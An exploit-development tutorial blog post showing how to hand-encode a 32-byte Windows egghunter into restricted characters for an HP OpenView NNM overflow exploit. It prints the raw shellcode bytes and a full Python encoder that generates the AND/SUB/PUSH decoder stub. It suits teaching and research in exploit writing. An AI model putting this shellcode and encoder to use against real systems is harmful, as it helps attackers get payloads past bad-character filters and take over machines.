Manual Egghunter/Shellcode Encoding using Python

You are probably wondering what this post is all about. Well, it is about manually encoding egghunter shellcode.

Why would you want to encode shellcode by hand when the Metasploit Framework has built-in encoders? Because, as the exploit below shows, the set of allowed characters can be so small that you end up hand-crafting the encoder anyway.

Before we begin, have a look at the following exploit by muts: HP OpenView NNM 7.5.1 OVAS.exe SEH PRE AUTH Overflow Exploit

I won't go into much detail about the process, because most of it has already been discussed in the Offensive Security HP NNM 0day presentation and on Peter Van Eeckhoutte's blog, in Exploit writing tutorial part 8: Win32 Egg Hunting, under the "Hand-crafting the encoder" and "Seeing this code run and reproduce the original egghunter is nice, but how can you build your own decoder?" sections.

What I'm about to show here are the calculations needed to make our shellcode free of bad characters. Doing them by hand can be a pain.

Because of the large number of bad characters we have to encode the egghunter manually, using only a limited set of allowed characters; with Python we can have a script do the arithmetic for us.

Again, I assume you have watched the Offsec video, read the tutorials, and already know what we are about to do here.

Detailed information about egghunters can be found in this document by skape:

http://www.hick.org/code/skape/papers/egghunt-shellcode.pdf

1. Get the egghunter source code here: http://www.hick.org/code/skape/shellcode/win32/

or download the compiled binaries here:

egghunt.exe (compiled egghunter)
egghunt_syscall.exe (compiled syscall egghunter)

2. Generate the egghunter shellcode

C:\>egghunt.exe cstyle 0x57303054
// 32 byte egghunt shellcode (egg=0x57303054)
unsigned char egghunt[] = "\x66\x81\xca\xff\x0f\x42\x52\x6a\x02\x58\xcd\x2e\x3c\x05\x5a\x74\xef\xb8\x54\x30\x30\x57\x8b\xfa\xaf\x75\xea\xaf\x75\xe7\xff\xe7";

3. Break our 32-byte egghunter shellcode into eight groups of 4 bytes:

"\x66\x81\xca\xff"
"\x0f\x42\x52\x6a"
"\x02\x58\xcd\x2e"
"\x3c\x05\x5a\x74"
"\xef\xb8\x54\x30"
"\x30\x57\x8b\xfa"
"\xaf\x75\xea\xaf"
"\x75\xe7\xff\xe7"

4. We will use the following group as an example:

"\x0f\x42\x52\x6a"

Read as a little-endian dword this is 0x6a52420f. The decoder stub zeroes EAX and then subtracts three values from it, so EAX ends up holding 0 - (a + b + c); for that to equal our dword, the three values must add up to its two's complement:

0xFFFFFFFF - 0x6a52420f + 1 = 0x95ADBDF1

We need to find three numbers, built only from the allowed character set, which when added give 0x95ADBDF1.

Instead of calculating this by hand we will use a custom-made Python script.

Now let's split the value into two 16-bit halves, 95AD and BDF1, and feed each one to the script. (Working on halves is only valid when neither half's sum overflows 16 bits; in this example both fit exactly, as the check at the end shows.)

* The script contains a list of allowed chars and uses it for its calculations.

exploit~#python encoder.py
Usage: encoder.py <hex value>
exploit~#python encoder.py 95AD
Got It!!
0x7f7f 0x152d 0x0101
exploit~#python encoder.py BDF1
Got It!!
0x7f7f 0x3d71 0x0101

Joining the matching halves gives our three dwords:

7f7f7f7f
152d3d71
01010101

Let's add our results and, voilà, we now have values made only from the allowed character set:

7f7f7f7f + 152d3d71 + 01010101 = 0x95ADBDF1
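The encoder.py used above was never published, so what follows is an added example of my own, not the author's script and not code from the original post. It carries the same calculation through for the whole egghunter and goes a bit beyond the post: instead of two 16-bit halves it searches one byte at a time and propagates carries, so it also copes with values where a half would overflow; it emits the AND/SUB decoder stub for every dword in the right (reverse) push order; and it includes a tiny interpreter for the three opcodes used so the result can be checked offline. The allowed character set is a constructed assumption (0x01-0x7f minus a few typical bad characters) standing in for the exploit's real list, and the two AND masks are the standard pair from the Corelan tutorial.

```python
"""Added example: byte-wise, carry-aware AND/SUB encoding of the egghunter.
NOT the author's encoder.py.  ALLOWED is a constructed stand-in for the real
exploit's allowed characters; AND_PAIR is the Corelan tutorial's zeroing pair."""
from typing import List, Tuple

# Constructed assumption: 0x01..0x7f allowed except a few typical bad chars.
# Replace with the bad-character list of the real target.
BAD_CHARS = {0x00, 0x0A, 0x0D, 0x20}
ALLOWED: List[int] = [b for b in range(0x01, 0x80) if b not in BAD_CHARS]
ALLOWED_SET = set(ALLOWED)

# Two masks with no bits in common: "and eax,A ; and eax,B" leaves EAX = 0.
AND_PAIR = (0x554E4D4A, 0x2A313235)

# The 32-byte egghunter from step 2 (egg=0x57303054).
EGGHUNTER = bytes.fromhex(
    "6681caff0f42526a0258cd2e3c055a74efb8543030578bfaaf75eaaf75e7ffe7")


def twos_complement(dword: int) -> int:
    """0xFFFFFFFF - dword + 1, as in the post; this is -dword mod 2**32."""
    return (0xFFFFFFFF - dword + 1) & 0xFFFFFFFF


def encode_dword(target: int) -> Tuple[int, int, int]:
    """Three dwords of ALLOWED bytes whose sum mod 2**32 is
    twos_complement(target).  Works from the least significant byte up and
    carries into the next byte, so no 16-bit-half overflow problem."""
    want = twos_complement(target)
    parts = [0, 0, 0]
    carry = 0
    for i in range(4):
        t = (want >> (8 * i)) & 0xFF
        hit = None
        for b1 in ALLOWED:
            for b2 in ALLOWED:
                # b1 + b2 + b3 + carry must be congruent to t mod 256
                for wrap in (0, 256, 512):
                    b3 = t + wrap - carry - b1 - b2
                    if b3 in ALLOWED_SET:
                        hit = (b1, b2, b3)
                        break
                if hit:
                    break
            if hit:
                break
        if hit is None:
            raise ValueError(f"byte {t:#04x} not reachable from ALLOWED")
        for k, b in enumerate(hit):
            parts[k] |= b << (8 * i)
        carry = (sum(hit) + carry) >> 8
    return parts[0], parts[1], parts[2]


def decoder_stub(target: int) -> bytes:
    """and eax,A ; and eax,B ; sub eax,v1 ; sub eax,v2 ; sub eax,v3 ; push eax"""
    stub = b"".join(b"\x25" + a.to_bytes(4, "little") for a in AND_PAIR)
    stub += b"".join(b"\x2d" + v.to_bytes(4, "little")
                     for v in encode_dword(target))
    stub += b"\x50"
    bad = [b for b in stub if b not in ALLOWED_SET]
    if bad:  # opcodes and AND masks must be allowed too
        raise ValueError(f"stub contains disallowed bytes: {bad}")
    return stub


def encode_shellcode(shellcode: bytes) -> bytes:
    """The stack grows down, so the last dword is pushed first and the
    payload is rebuilt in order."""
    if len(shellcode) % 4:
        raise ValueError("pad the shellcode to a multiple of 4 bytes")
    dwords = [int.from_bytes(shellcode[i:i + 4], "little")
              for i in range(0, len(shellcode), 4)]
    return b"".join(decoder_stub(d) for d in reversed(dwords))


def run_stub(encoded: bytes) -> bytes:
    """Interpreter for the three opcodes the stub uses; returns the bytes the
    pushes leave on the stack, lowest address first."""
    eax, stack, i = 0, b"", 0
    while i < len(encoded):
        op = encoded[i]
        if op in (0x25, 0x2D):
            imm = int.from_bytes(encoded[i + 1:i + 5], "little")
            eax = eax & imm if op == 0x25 else (eax - imm) & 0xFFFFFFFF
            i += 5
        elif op == 0x50:
            stack = eax.to_bytes(4, "little") + stack
            i += 1
        else:
            raise ValueError(f"unexpected opcode {op:#04x} at offset {i}")
    return stack


if __name__ == "__main__":
    v1, v2, v3 = encode_dword(0x6A52420F)  # the post's example dword
    print(f"{v1:08x} + {v2:08x} + {v3:08x} = {(v1 + v2 + v3) & 0xFFFFFFFF:08x}")
    encoded = encode_shellcode(EGGHUNTER)
    print(f"{len(EGGHUNTER)} -> {len(encoded)} bytes, decodes correctly:",
          run_stub(encoded) == EGGHUNTER)
```

With this allowed set the search happens to land on the same three values as the post (0x01010101, 0x152d3d71, 0x7f7f7f7f, in a different order). Each dword costs 26 bytes of stub, so the 32-byte egghunter grows to 208 bytes; the emulator exists only to confirm the arithmetic before you spend a debugger session on it.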

Video: Shellcode Encoding Using Python (Vimeo)

*** Special thanks to shatun for helping me by translating my needs into code ***


2 Comments


  1. shellc0d3
    Oct 05, 2010

    Where can I find the encoder.py?


  2. NightRanger
    Oct 06, 2010

    Sorry the script is not available for downloading.
